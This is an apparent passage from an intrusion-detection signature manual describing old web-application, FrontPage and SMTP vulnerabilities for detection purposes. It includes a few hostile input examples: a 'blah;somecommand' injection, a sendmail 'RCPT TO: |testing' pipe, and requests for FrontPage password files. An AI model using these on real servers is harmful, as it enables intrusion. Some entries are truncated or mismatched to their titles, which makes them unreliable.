WEB-PHP Phorum violation access Vulnerability
add enhanced features to a web page, allowing users to interact through bulletin board style chats forums. Phorum
(Phorum version 3.0.7) allow remote users to arbitrarily relay email. A remote attacker could create a specially-crafted
URL request to the violation.php3 script using ForumName and Mod variable, an attacker could use this vulnerability
to send e-mails to arbitrary address. Upgrade the latest version of Phorum(3.2.11), available at vendor's website.
Signature ID: 1877
WEB-PHP Photopost PHP Pro showphoto.php access Vulnerability
Signature Description: PhotoPost is photo sharing gallery software. It is written in PHP. PhotoPost PHP Pro(PhotoPost
PHP Pro version 4.6 and prior) is vulnerable to SQL injection, caused by input validation vulnerability. A remote
attacker could exploit this vulnerability by passing malicious SQL commands to Showphoto.php script using 'photo'
variable, which would allow the attacker to obtain sensitive information to possible add, modify, or delete information
in the backend database.
257
Signature ID: 1878
WEB-PHP PhpGedView PGV authentication_index.php base directory manipulation
Vulnerability
Signature Description: PHPGedView(PGV) is a free PHP-based web application for working with genealogy data on
the internet. PHPGedView has full editing capabilities, can import from GEDCOM files, and supports the multimedia.
PHPGedView(PHPGedView version 2.61) is prone to multiple file include vulnerabilities. BY sending a speciallycrafted URL request to the authentication_index.php script using the $PGV_BASE_DIRECTORY variable to specify a
malicious file from a remote system as a parameter, a remote attacker could use this vulnerability and execute arbitrary
code on the vulnerable server. Upgrade the latest version, which is available at vendor's website.
Signature ID: 1879
WEB-PHP PhpGedView PGV base directory manipulation Vulnerability
PHPGedView(PHPGedView version 2.61) is prone to multiple file include vulnerabilities. BY sending a speciallycrafted URL request to the _conf.php script using the $PGV_BASE_DIRECTORY variable to specify a malicious file
from a remote system as a parameter, a remote attacker could use this vulnerability and execute arbitrary code on the
vulnerable server. Upgrade the latest version, which is available at vendor's website.
Signature ID: 1880
WEB-PHP PhpGedView config_gedcom.php base directory manipulation Vulnerability
PHPGedView(PHPGedView version 2.61) is prone to multiple file include vulnerabilities. BY sending a speciallycrafted URL request to the config_gedcom.php script using the $PGV_BASE_DIRECTORY variable to specify a
malicious file from a remote system as a parameter, a remote attacker could use this vulnerability and execute arbitrary
code on the vulnerable server. Upgrade the latest version, which is available at vendor's website.
Signature ID: 1881
WEB-PHP PhpGedView functions.php base directory manipulation Vulnerability
PHPGedView(PHPGedView version 2.61) is prone to multiple file include vulnerabilities. BY sending a speciallycrafted URL request to the functions.php script using the $PGV_BASE_DIRECTORY variable to specify a malicious
file from a remote system as a parameter, a remote attacker could use this vulnerability and execute arbitrary code on
the vulnerable server. Upgrade the latest version, which is available at vendor's website.
258
Signature ID: 1882
WEB-PHP PhpGedView search.php access Vulnerability
PHPGedView(PHPGedView version 2.61) is vulnerable to cross-site scripting. BY creating a specially-crafted URL
link to the search.php script containing embedded code in the 'firstname' variable, once the link is clicked. A remote
attacker could execute arbitrary code on the victim's web browser. No remedy available as of August, 2008.
Signature ID: 1883
WEB-PHP MediaWiki Setup.php access Vulnerability
Bugtraq: 9057
The Affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829.
Signature ID: 1884
WEB-PHP TUTOS path disclosure Vulnerability
Bugtraq: 10129
Signature Description: Tutos(The Ultimate Team Organization Software) is a freely available, open-source, team
organization software package. It is available for UNIX, Linux, and Microsoft Windows operating systems. TUTOS
(TUTOS version 1.1.20030715) is a cross-site scripting vulnerability, caused by improper filtering of user-supplied
input. A remote attacker could embed malicious script in a URL request to the note_overview.php script using the id
variable, which would be executed in the victim's browser, once the link is clicked. An attacker could use this
vulnerability to obtain the victim's cookie-based authentication credentials. Upgrade to the latest version of TUTOS,
Signature ID: 1885
WEB-PHP MediaWiki Title.php access Vulnerability
Bugtraq: 9057
Signature Description: WEB-PHP MediaWiki Title.php accessA vulnerability has been reported in MediaWiki, which
can be exploited by malicious people to compromise a vulnerable system.The vulnerability is caused due to an input
validation error in "UpdateClasses.php", "Title.php", "Setup.php", "GlobalFunctions.php", and
"DatabaseFunctions.php". This can be exploited to execute arbitrary code on a vulnerable system by supplying a path to
a malicious file on a remote system via the "$IP" variable. The Affected versions are MediaWiki-stable 20031107 and
MediaWiki-stable 20030829.
Signature ID: 1886
WEB-PHP Typo3 translations.php file include Vulnerability
Bugtraq: 6984
Signature Description: TYPO3 is a free and opensource content management system. It is written in PHP and running
under UNIX and Windows operating systems. TYPO3(TYPO3 versions 3.5b5 and prior) could allow a remote attacker
259
to include remote files on the system. By sending a specially-crafted URL request to the 'translation.php' script that
specifies a remote file using the 'ONLY' parameter, a remote attacker could use this vulnerability and execute arbitrary
code on the system. Upgrade the latest version, available at vendor's website.
Signature ID: 1887
WEB-PHP MediaWiki UpdateClasses.php access Vulnerability
Bugtraq: 9057
UpdateClasses.php.
Signature ID: 1888
WEB-PHP WAnewsletter db_type.php access Vulnerability
Bugtraq: 6964
Signature Description: WAnewsletter is a newsletter management script. It is implemented in PHP and will run on
Microsoft Windows and Unix/Linux operating systems. WAnewsletter(WAnewsletter versions 2.0.2-2.1.0) could allow
remote attacker to include malicious PHP files. By sending a specially-crafted URL request to the sql/db_type.php
script that specifies a remote file using the 'waroot' parameter, a remote attacker could exploit this vulnerability and
execute arbitrary code on the vulnerable web server. Upgrade the latest version of WAnewsletter, available at vendor's
website.
Signature ID: 1889
WEB-PHP WAnewsletter newsletter.php file include Vulnerability
Bugtraq: 6965
Signature Description: WAnewsletter is a newsletter management script. It is implemented in PHP and will run on
Microsoft Windows and Unix/Linux operating systems. WAnewsletter(WAnewsletter versions 2.0.2-2.1.0) could allow
remote attacker to include malicious PHP files. By sending a specially-crafted URL request to the newsletter.php script
script that specifies a remote file using the 'waroot' parameter, a remote attacker could exploit this vulnerability and
execute arbitrary code on the vulnerable web server. Upgrade the latest version of WAnewsletter, available at vendor's
website.
Signature ID: 1890
WEB-PHP WebChat db_mysql.php file include Vulnerability
Signature Description: WebChat is an open-source PHP-based chat program, developed by Webdev. WebChat version
0.77 could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted
URL request to the defines.php script that specifies the db_mysql.php or english.php script from a remote system as a
parameter, which would allow the attacker to execute code on the vulnerable Web server. Upgrade to the latest version
of WebChat, available at Vendor's website.
260
Signature ID: 1891
WEB-PHP WebChat english.php file include Vulnerability
Signature Description: WebChat is an open-source PHP-based chat program, developed by Webdev. WebChat version
0.77 could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted
URL request to the defines.php script that specifies the db_mysql.php or english.php script from a remote system as a
parameter, which would allow the attacker to execute code on the vulnerable Web server. Upgrade the latest version of
WebChat, available at vendor's website.
Signature ID: 1892
WEB-PHP YaBB SE packages.php file include Vulnerability
Bugtraq: 6663
Signature Description: YaBB (Yet Another Bulletin Board) is an open-source bulletin board system that runs on any
system capable of executing Perl CGI scripts. YaBB SE versions prior to 1.5.0 could allow a remote attacker to include
malicious PHP files. A remote attacker could use the $sourcedir variable with the Packages.php script that specifies the
Packer.php script from a remote system as a parameter, which would allow the attacker to execute code on the
vulnerable Web server. No remedy available as of 2008.
Signature ID: 1894
WEB-PHP Nuke Remote File Copy Vulnerability
on PHP and MySQL. The system is fully controlled using a web-based user interface. PHP-Nuke(PHP-Nuke versions
5.0, 5.0.1, 5.1, and 5.2) could allow a remote attacker ot overwrite files on the web server, caused by vulnerability in
the admin.php script. When the admin.php script is requested with the 'upload' variable set, the script fails to check
whether the user is an administrator. A remote attacker could exploit this vulnerability to copy, upload, and overwrite
arbitrary files on the Web server. No remedy available as of August, 2008.
Signature ID: 1896
VBulletin Calendar.PHP Command Execution Vulnerability
Signature Description: VBulletin is a programme that is used to create Internet Forums or Message Boards. vBulletin
was written in PHP using a MySQL database server. vBulletin(vBulletin versions 2.2.0 and prior) could allow a remote
attacker to execute commands on the server. A remote attacker could pass arbitrary shell commands(such as ;,:,|,/,\) to
the web server using an HTTP request to the calender.php script, which would be executed on the system with
privileges of the user.
Signature ID: 1897
WEB-PHP E107 chatbox.php DOS Vulnerability
Signature Description: E107 is an open source content management system(CMS) that allow for the quick creation and
management of websites or community portals. E107(e107 versions 0.545, 0.603) is a vulnerable to a denial of service.
The issue has been reported to exist due to improper handling of user-supplied data in the form of HTML or script code
to the 'Name:' field of Chatbox.php script. This issue may cause the software to behave in an unstable manner leading
261
to a crash.Successful exploitation of this issue may allow an attacker to cause the software to crash or hang. Upgrade
the lates version of E107, which available at vendor's website.
Signature ID: 1899
WEB-PHP content-disposition memchr overflow Vulnerability
Signature Description: PHP is a scripting language widely used in web development. It can be installed on a variety of
web servers, including Apache, IIS, Caudium, Netscape and iPlanet. PHP (PHP versions 4.1.0, 4.1.1, 4.0.6 and 3.0.x) is
a buffer overflow vulnerability in the handling of file uploads. Specifically, this problem occurs in the functions which
are used to decode MIME encoded files. As a result, it may be possible to overrun the buffer used for the vulnerable
functions to cause arbitrary attacker-supplied instructions to be executed.Successful attacker can execute his attack
code in the context of authorised user on the affected system.
Signature ID: 1900
WEB-PHP Marcus Xenakis directory.php arbitrary command attempt_1 Vulnerability
Signature Description: Marcus Xenakis directory.php is vulnerable to shell command execution attacks. The
directory.php script provides a web interface for direcotry listings. The directory.php script could allow a remote
attacker to send a specially-crafted HTTP request containing 'directory.php' and shell metacharacters(such as ; or |) in
the 'dir' parameter, An issue exists in this script which could allow a user to execute arbitrary shell commands on the
system. No remedy available as of August, 2008.
Signature ID: 1901
WEB-PHP Vibechild Directory Manager edit_image.php access Vulnerability
Signature Description: Directory Manager 0.9 is an application used to maintain LDAP directory data. It is maintained
by Vibechild and hosted for download on Sourceforge.net.An input validation error exists in Directory Manager that
may enable remote attackers to execute arbitrary code on a host running the software. The flaw is due to a script in the
package that fails to filter shell meta characters from a user-supplied value passed to PHP's passthru()
function.Exploitation of this vulnerability may lead to the disclosure of sensitive data on or compromise of a vulnerable
host.
Signature ID: 1902
WEB-PHP Bytehoard files.inc.php access Vulnerability
Signature Description: Bytehoard is a file storage/transfer application that is implemented in PHP. A remote attacker
could send a specially-crafted HTTP request to the files.inc.php script to view the root directory of the victim's system.
It is possible for the attacker to gain unauthorized access to the web root and permits an attacker to traverse directories
in and outside of the web root directory, potentially resulting in information disclosure. The vulnerable versions are
Bytehoard 0.7.0 and Bytehoard 0.71.0.
Signature ID: 1903
WEB-PHP Pod.Board forum_details.php access Vulnerability
262
Signature Description: Pod.board is a web-based portal/forum system. Implemented in PHP, The pod.board
'forum_details.php' script does not sufficiently sanitize data supplied via URI Parameters 'user_homepage',
'user_location', 'user_nick' and 'user_signature'and the corresponding input fields are not properly sanitized of HTML
tags. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page
that contains the malicious injected code.It is available for a range of systems, including Unix, Linux, and Microsoft
Windows.The vulnerable version is planetinsanity.de pod.board 1.1.0.
Signature ID: 1904
WEB-PHP VBPortal friends.php access Vulnerability
Bugtraq: 9088
Signature Description: VbPortal is a portal application which can be used in conjunction with vbBulletin forums. The
vulnerability is found in Friends.PHP script included in vbPortal, it may be possible for a remote attacker to relay
unauthorized e-mail. Issue occur in handling of the yname and ymail variables. These variables may be modified in the
headers, making it possible to define them as an arbitrary value. This could permit an attacker to send e-mail through
the server to any location, hiding behind the address of the vbPortal server. The vulnerable version is vbPortal vbPortal
2.0.0 alpha 8.1.
Signature ID: 1905
WEB-PHP gallery remote file include Vulnerability
Signature Description: Gallery is prone to a remote file include vulnerability in the index.php script file. when running
on Windows or in Configuration mode on Unix, allows remote attackers to inject arbitrary PHP code via a URL in the
GALLERY_BASEDIR parameter with the privileges of the web server. The Vulnerable versions are Gallery 1.4 -pl1
and Gallery 1.4.
Signature ID: 1906
WEB-PHP myPHPNuke chatheader.php Cross site scripting Vulnerability
Bugtraq: 6544
Signature Description: MyPHPNuke is a Web Portal System based on PHP-Nuke 4.4.1a. It is available for the Linux
and Microsoft Windows operating systems. The vulnerability exists in the chatheader.php and partner.php script files
included with myPHPNuke. Specifically, malicious HTML code is not properly sanitized from the value for the
'Default_Theme' URI parameter. This vulnerability was reported for myPHPNuke 1.8.8_final_7 and earlier versions.
This signature detects when the attacker sending XSS to chatheader.php script.
Signature ID: 1907
WEB-PHP myPHPNuke partner.php Cross site scripting Vulnerability
Bugtraq: 6544
Signature Description: MyPHPNuke is a Web Portal System based on PHP-Nuke 4.4.1a. It is available for the Linux
and Microsoft Windows operating systems. The vulnerability exists in the chatheader.php and partner.php script files
included with myPHPNuke. Specifically, malicious HTML code is not properly sanitized from the value for the
'Default_Theme' URI parameter. This vulnerability was reported for myPHPNuke 1.8.8_final_7 and earlier versions.
This signature detects when the attacker sending XSS to partner.php script.
263
Signature ID: 1908
WEB-PHP myphpPagetool pt_config.inc file include Vulnerability
Bugtraq: 6744
Signature Description: MyphpPagetool is an application used to maintain a web site using a mysql database, which
stores and manage all web pages and their contents. myphpPagetool is written in PHP and is available for a variety of
platforms.myphpPageTool 0.4.3 -1 is vulnerable version, which may allow remote attackers to include path for
'pt_config.inc' files located on remote servers. This issue is present in the index.php, help1.php, help2.php, help3.php,
help4.php, help5.php, help6.php, help7.php, help8.php and help9.php pages existing in the /doc/admin folder.
Signature ID: 1909
WEB-PHP YaBB SE news.php file include Vulnerability
Bugtraq: 6674
Signature Description: YaBB SE is a freely available, open source port of Yet Another Bulletin Board (YaBB). Due to
insufficient sanitization of some user-supplied variables by the 'News.php' script, it is possible for a remote attacker to
include a malicious PHP file in a URL. It is available for platforms include Unix, Linux, and Microsoft Windows
operating systems. An attacker may exploit this by supplying a path to a maliciously created file, located on an
attacker-controlled host as a value for the '$template' parameter. The vulnerable versions are YaBB SE 1.5.1 and
earlier.
Signature ID: 1910
WEB-PHP newsPHP Language file include Vulnerability
Bugtraq: 8488
Signature Description: File include vulnerability has been reported in the nphpd.php module of newsPHP 216 that may
permit an attacker to include and execute malicious script code on a vulnerable host.The issue is reported to exist in the
LangFile variable of nphpd.php module of the software. Successful exploitation may lead to execution of arbitrary code
on a vulnerable system by a remote attacker.
Signature ID: 1911
WEB-PHP phpMyAdmin db_details_importdocsql.php access Vulnerability
Bugtraq: 7965,7963 Nessus: 11761
Signature Description: PhpMyAdmin is a freely available tool that provides a web interface for handling MySQL
administrative tasks.The flaw present in phpMyAdmin whereby passwords are stored in a plain text format, due to that
even a local user can have the privilege to view the cookie information and access the site hosting phpMyAdmin as a
victim user. phpMyAdmin 2.5.1 or lower are vulnerable.Furthermore, this issue could be exaggerated by the fact that
the credentials may be used across multiple systems.
Signature ID: 1912
WEB-PHP phpbb quick-reply.php access Vulnerability
Signature Description: This event is generated when an attempt is made to gain unauthorized access to a PHP
application running on a web server. Some applications do not perform stringent checks when validating the credentials
escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships
264
between the victim server and other hosts can be exploited by the attacker. phpBB Advanced Quick Reply Hack 1.1.0
and phpBB Advanced Quick Reply Hack 1.0.0 are vulnerable.
Signature ID: 1913
WEB-PHP phpbb quick-reply.php arbitrary command Vulnerability
Signature Description: PhpBB Advanced Quick Reply Hack is a freely available phpBB modification. It adds the
functionality of allowing users to post quick replies to messages. The phpBB Advanced Quick Reply Hack is prone to
an issue which may allow attackers to include arbitrary files from a remote server. It is possible for remote attackers to
influence the include path for 'extension.inc' in the 'quick_reply.php' script. As a result, an attacker may cause an
arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with
the privileges of the web server. phpBB Advanced Quick Reply Hack 1.1.0 and phpBB Advanced Quick Reply Hack
1.0.0 are vulnerable.
Signature ID: 1914
WEB-PHP BadBlue phptest.php access Vulnerability
Signature Description: BadBlue is a P2P file sharing application distributed by Working Resources, its powerful Office
file sharing works over the web. BadBlue Server is prone to a remote path disclosure vulnerability that may allow an
attacker to disclose the installation path by issuing a request for 'phptest.php' script, the source code of the html
contains the local path of the server on the machine.BadBlue version 2.4 has been reported to be affected by this issue,
however, other versions may be vulnerable as well.
Signature ID: 1915
WEB-PHP piranha passwd.php3 access Vulnerability
Signature Description: A vulnerability exists in the passwd.php3 cgi-bin script, as included by RedHat as part of the
Piranha virtual server package, in RedHat Linux 6.2. Due to improper checking of input, The security problem arises
from the "http://localhost/piranha/secure/passwd.php3" file. It is possible to execute commands by entering 'blah;somecommand' into the password fields. Everything after the semicolon is executed with the same privilege as the
webserver. This may be used to leverage access to the machine, resulting in further compromise.
Signature ID: 1916
WEB-PHP pmachine remote file include Vulnerability
Signature Description: PMachine is a freely available PHP-based publishing program that uses a MySQL backend
database. pMachineFree version 2.2.1 could allow a remote attacker to include malicious PHP files, caused by
improper filtering of user-supplied input. A remote attacker could send a specially-crafted URL request to the
lib.inc.php? script using the pm_path variable that specifies a malicious PHP file on a remote system as a parameter,
which could then be used by the attacker to execute arbitrary code on the vulnerable system.
Signature ID: 1918
WEB-PHP remote include path Vulnerability
Signature Description: PHP is a computer scripting language. It is designed for creating dynamic web pages. When a
265
visitor opens the page, the server processes the PHP commands and then sends the results to the visitor's browser. This
rule will triggers when an attacker request to the '.php' files with the 'path' parameter. The successful exploitation of this
issue will allow an attackers to execute arbitrary PHP code.
Signature ID: 1919
WEB-PHP rolis guestbook access Vulnerability
Bugtraq: 9057
Signature Description: MediaWiki 'IP' is vulnerable to Parameter Remote File Include.The problem occurs due to
insufficient input validation carried out on user-supplied URI parameters. As a result, an attacker may be capable of
causing a malicious PHP header file to be interpreted by a target system. Depending on the payload, this could
potentially allow an attacker to gain unauthorized remote access to a vulnerable system. Vulnerable platforms are
MediaWiki-stable 20031107 and MediaWiki-stable 20030829
Signature ID: 1920
WEB-PHP rolis guestbook remote file include Vulnerability
Bugtraq: 9057
Signature Description: MediaWiki 'IP' is vulnerable to Parameter Remote File Include. The problem occurs due to
insufficient input validation carried out on user-supplied URI parameters. As a result, an attacker may be capable of
causing a malicious PHP header file to be interpreted by a target system. Depending on the payload, this could
potentially allow an attacker to gain unauthorized remote access to a vulnerable system. Vulnerable platforms are
MediaWiki-stable 20031107 and MediaWiki-stable 20030829
Signature ID: 1921
WEB-PHP smssend.php access Vulnerability
Signature Description: PhpSmsSend is a front end to the SmsSend program, and allows users to send SMS messages
through a web interface. SmsSend is available for Linux and Microsoft Windows. PhpSmsSend 1.0 does not properly
validate user supplied input which is passed to a shell command. A malicious party may include escape characters such
as '`' in the input, and execute additional, arbitrary shell command. This may lead to local access to the vulnerable
system.
Signature ID: 1922
WEB-PHP squirrel mail spell-check arbitrary command Vulnerability
Bugtraq: 3952
Signature Description: SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is
available for Linux and Unix based operating systems. The vulnerability exist in, one of the plugins included with
SquirrelMail is SquirrelSpell, a spellchecker script. The remote user can call this script with additional shell commands
included in these variables. The shell commands will then be executed as the web server, which is possible to gain local
access to the machine as the non-privileged user 'nobody'.
Signature ID: 1923
WEB-PHP squirrel mail theme arbitrary command Vulnerability
Signature Description: SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is
266
available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin
system. A vulnerability has been reported in some versions of SquirrelMail, it is possible to corrupt the variable used to
select a user's theme, through maliciously constructed cookie data and force the vulnerable script to execute arbitrary
commands.
Signature ID: 1924
WEB-PHP W4 Server Cgitest.exe Buffer Overflow Vulnerability
Bugtraq: 802
Signature Description: W4-Server 2.6a, 32-bits personal webserver by Antelope Software having flaw in Cgitest.exe
script. This compiled CGI script fails to perform bounds checking on user supplied data and is vulnerable to a buffer
overflow.The vulnerability is due to insufficient bounds checking on user-supplied data sent to the Cgitest.exe sample
CGI executable. Remote attackers can send carefully constructed values to overflow the buffer and execute arbitrary
code.
Signature ID: 1926
WEB-FRONTPAGE access.cnf access Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) version 5.1 could reveal file contents. If a remote
attacker sends a specially-crafted GET request containing "dot dot" sequences (/../) to the server for one of the .cnf files
in the /_vti_pvt/ directory, the attacker could cause the server to return the contents of the requested file.
Signature ID: 1927
WEB-FRONTPAGE administrators.pwd access Vulnerability
Bugtraq: 1205
Signature Description: Microsoft FrontPage Extensions creates an administrators.pwd file inside the _vti_pvt directory
in the HTTP server's document root. This file contains encrypted passwords which could be remotely retrieved by an
attacker and cracked offline. If the passwords in this file are weak enough, or enough time is spent cracking them, the
attacker could potentially obtain the plaintext password and use it to access resources on the server.
Signature ID: 1928
WEB-FRONTPAGE author.exe access Vulnerability
Bugtraq: 2144
Signature Description: Microsoft IIS ships with Front Page Server Extensions (FPSE) which enables administrators
remote and local web page and content management. This event is generated when an attempt is made to use a
Frontpage client to connect and/or publish content to a web server with Frontpage Server Extensions-enabled.
Vulnerable platforms are Microsoft IIS 4.0 and 5.0.
Signature ID: 1929
WEB-FRONTPAGE cfgwiz.exe access vulnerability
Signature Description: Microsoft FrontPage Server Extensions 2002 and prior version have serious security
vulnerabilities which could enable an attacker to run arbitrary code on a user's system. An attacker who successfully
exploited this vulnerability will try to access FRONTPAGE /cfgwiz.exe file and could able to run code with Local
System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
267
Signature ID: 1930
WEB-FRONTPAGE contents.htm access Vulnerability
vulnerabilities which could enable an attacker to run arbitrary code on a user's system.An attacker who successfully
exploited this vulnerability could be able to run code with Local System privileges on an affected system, or could
cause FrontPage Server Extensions to fail. This signature detects access to vulnerable contents.htm file.
Signature ID: 1931
WEB-FRONTPAGE form_results access Vulnerability
Signature Description: Microsoft FrontPage stores form results in a default location in /_private/form_results.txt,
which is world-readable and accessible in the document root, which allows remote attackers to read possibly sensitive
information submitted by other users. The attacker is required to have prior knowledge of file names to exploit this
vulnerability, which does not yield any other privileges than read access.
Signature ID: 1932
WEB-FRONTPAGE form_results.htm access Vulnerability
Signature Description: A vulnerability in the file access protocols of the Microsoft Personal Web Server (PWS) and
FrontPage PWS could allow arbitrary files to be remotely read. Microsoft FrontPage Server Extensions 2002 and prior
version have serious security vulnerabilities which could enable an attacker to run arbitrary code on a user's system. An
attacker who successfully exploited this vulnerability could be able to run code with Local System privileges on an
affected system, or could cause FrontPage Server Extensions to fail. The attacker is required to have prior knowledge
of file names to exploit this vulnerability, which does not yield any other privileges than read access.
Signature ID: 1933
WEB-FRONTPAGE fpadmcgi.exe access Vulnerability
Signature Description: On the Web server computer, Fpadmdll.dll or Fpadmcgi.exe acts as the form handler for any of
the SharePoint Team Services and FrontPage 2002 Server Extensions HTML Administration pages.Microsoft
FrontPage Server Extensions 2002 and prior version have serious security vulnerabilities which could enable an
attacker to run arbitrary code on a user's system. An attacker who successfully exploited this vulnerability could be able
to run code with Local System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1934
WEB-FRONTPAGE fpadmin.htm access Vulnerability
Signature Description: HTML Administration Forms is used to install and administer Microsoft FrontPage Server
Extensions remotely with a Web browser. When you install FrontPage Server Extensions during Microsoft Office
Server Extensions (OSE) Setup, the forms are copied to your Web server. When you install the forms on your Web
server, your home page for the HTML Administration Forms is Fpadmin.htm. Microsoft FrontPage Server Extensions
2002 and prior version have serious security vulnerabilities which could enable an attacker to run arbitrary code on a
user's system. An attacker who successfully exploited this vulnerability could be able to run code with Local System
privileges on an affected system, or could cause FrontPage Server Extensions to fail.
268
Signature ID: 1935
WEB-FRONTPAGE fpremadm.exe access Vulnerability
Signature Description: Fpremadm uses Fpadmdll.dll, which is the same server-side ISAPI program as the HTML
Administration Forms. Fpremadm is the utility that actually lets you administer FrontPage Server Extensions remotely.
The Fpremadm utility interface is based on the administration utility Fpsrvadm.exe and performs all of the same
commands. Fpremadm requires Microsoft Internet Explorer installed on the client computer. Microsoft FrontPage
Server Extensions 2002 and prior version have serious security vulnerabilities which could enable an attacker to run
arbitrary code on a user's system. An attacker who successfully exploited this vulnerability could be able to run code
with Local System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1936
WEB-FRONTPAGE fpsrvadm.exe access Vulnerability
Signature Description: Fpremadm is the utility that actually lets you administer FrontPage Server Extensions remotely.
The Fpremadm utility interface is based on the administration utility Fpsrvadm.exe and performs all of the same
commands. Fpremadm requires Microsoft Internet Explorer installed on the client computer. Microsoft FrontPage
Server Extensions 2002 and prior version have serious security vulnerabilities which could enable an attacker to run
arbitrary code on a user's system. An attacker who successfully exploited this vulnerability could be able to run code
with Local System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1937
WEB-FRONTPAGE frontpage rad fp4areg.dll access Vulnerability
Signature Description: Microsoft Front Page Server Extensions (FPSE), included in IIS Web Server, contain a flaw
that may allow a remote attacker to execute arbitrary code. The issue is due to a sub-component in FPSE called Visual
Studio Remote Application Deployment (RAD) which allows Visual InterDev users to register and un-register
programming components on the IIS server. The sub-component contains an unchecked buffer that may allow an
attacker to execute arbitrary code with IUSR_Machine privileges.Vulnerable platforms are Microsoft, FrontPage Server
Extensions 2000, Microsoft IIS 4.0, Microsoft IIS 5.0, Microsoft Windows 2000 Advanced Server.
Signature ID: 1938
WEB-FRONTPAGE orders.htm access Vulnerability
cause FrontPage Server Extensions to fail. This signature detects access to vulnerable orders.htm file.
Signature ID: 1939
WEB-FRONTPAGE orders.txt access Vulnerability
cause FrontPage Server Extensions to fail. 
269
Signature ID: 1940
WEB-FRONTPAGE register.htm access Vulnerability
Signature Description: Microsoft Frontpage Extensions on IIS or Apache web servers are vulnerable to Information
Disclosure vulnerability.The web server may allow remote users to read sensitive information from .htm files.By
submitting a request for one of the vulnerable files by way of '/_private/register.htm', will cause the host to reveal
sensitive information
Signature ID: 1941
WEB-FRONTPAGE register.txt access Vulnerability
Disclosure vulnerability. The web server may allow remote users to read sensitive information from .txt files. By
submitting a request for one of the vulnerable files by way of '/_private/', will cause the host to reveal sensitive
information 
Signature ID: 1942
WEB-FRONTPAGE registrations.htm access Vulnerability
Disclosure vulnerability.The web server may allow remote users to read sensitive information from .htm files.By
submitting a request for one of the vulnerable files by way of '/_private/registrations.htm', will cause the host to reveal
sensitive information. 
Signature ID: 1943
WEB-FRONTPAGE registrations.txt access Vulnerability
Disclosure vulnerability.The web server may allow remote users to read sensitive information from .txt files.By
submitting a request for one of the vulnerable files by way of '/_private/', will cause the host to reveal sensitive
information
Signature ID: 1944
WEB-FRONTPAGE service.cnf access Vulnerability
Disclosure vulnerability.The web server may allow remote users to read sensitive information from .cnf files.By
submitting a request for one of the vulnerable files by way of '/_vti_pvt/', will cause the host to reveal sensitive
information 
Signature ID: 1945
WEB-FRONTPAGE service.pwd Vulnerability
Bugtraq: 1205
Disclosure vulnerability.The web server may allow remote users to read sensitive information from .pwd files.
Microsoft FrontPage 98 Server Extensions for IIS and Microsoft FrontPage 1.1 are Vulnerable.
270
Signature ID: 1947
WEB-FRONTPAGE services.cnf access Vulnerability
Signature Description: Microsoft Frontpage Extensions on IIS 5.1 or Apache web servers are vulnerable to Information
submitting a request for one of the vulnerable files by way of '/_vti_pvt/', will cause the host to reveal sensitive
information.
Signature ID: 1948
WEB-FRONTPAGE svcacl.cnf access Vulnerability
submitting a GET requests for one of the vulnerable files 'access.cnf', 'botinfs.cnf', 'bots.cnf' or 'linkinfo.cnf' by way of
'/_vti_pvt/', will cause the host to reveal sensitive information.
Signature ID: 1949
WEB-FRONTPAGE users.pwd access Vulnerability
Disclosure vulnerability. This signature triggers when an attempt is made to compromise a host running Microsoft
FrontPage Server Extensions when an attempt is made to retrieve the file users.pwd. This file contains user password
information.The vulnerable platform is Windows 98 using Microsoft FrontPage Server Extensions.Denial of Service is
possible.
Signature ID: 1950
WEB-FRONTPAGE writeto.cnf access Vulnerability
Disclosure vulnerability. The web server may allow remote users to read sensitive information from .cnf files.
Submitting a request for one of the vulnerable files by way of '/_vti_pvt/writeto.cnf', through GET request, will cause
the host to reveal system path information. The reported problematic files are 'access.cnf', 'botinfs.cnf', 'bots.cnf' and
'linkinfo.cnf'.
Signature ID: 1951
WEB-PHP Marcus Xenakis directory.php arbitrary command attempt Vulnerability
Signature Description: Xenakis is vulnerable to shell command execution attacks. Marcus S. Xenakis PHP-Scripts very
often use simple calls of shell commands. The Xenakis directory.php script provides a web interface for directory
listings, similar to the 'ls' command. An issue exists in this script which could allow a user to execute arbitrary shell
commands. This is achieved by including metacharacters such as ';' or '|' in the script's input. Shell commands will
execute with the permissions of the script process, often a non-privileged user 'nobody'.
271
Signature ID: 1952
MS Internet Explorer ActiveX bgColor Property Denial of Service Vulnerability
Signature Description: Microsoft's Internet Explorer 5.0 or above version on Windows 2000, XP, 2003 and Vista are
vulnerable to denial of service attacks. The issue is due to vulnerability in multiple ActiveX controls included in
Internet Explorer and the application fails to handle exceptional conditions. By accessing the bgColor, fgColor,
linkColor, alinkColor, and vlinkColor, or defaultCharset properties in the giffile, htmlfile, jpegfile, mhtmlfile, ODCfile,
pjpegfile, pngfile, xbmfile, xmlfile, xslfile, or wdfile objects in mshtml.dll, or the TriEditDocument.TriEditDocument
or TriEditDocument.TriEditDocument.1 objects in triedit.dll can cause a NULL pointer dereference. This vulnerability
can be exploited by a malicious web page and results in a termination of the Internet Explorer process.
Signature ID: 2002
SMTP VRFY command Vulnerability
Signature Description: SMTP(Simple Mail Transfer Protocol) is a TCP/IP protocol. It is used to transfer e-mail
messages between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages from
one server to another. VRFY command will request that the receiving SMTP server verify that a given email user name
is valid. The SMTP server will reply with the login name of the user. If the VRFY command is enabled, the remote
attackers determine user accounts. Once they have determined a user account they can attempt to determine a password
for that account. The successful exploitation of this issue will allow an attacker to gain information or cause crash the
systems.
Signature ID: 2003
Sendmail mailing to programs attempt
Signature Description: Some SMTP servers do not complain when issued the command: MAIL FROM:
root@this_host RCPT TO: |testing. This probably means that it is possible to send mail directly to programs, which is a
serious threat, since this allows anyone to execute arbitrary command on this host. This security hole might be a false
positive, since some MTAs will not complain to this test, and instead will just drop the message silently. This rule will
triggers when an attempt is made to send pipe symbol in SMTP to header.
Signature ID: 2004
Sendmail mailing to files attempt
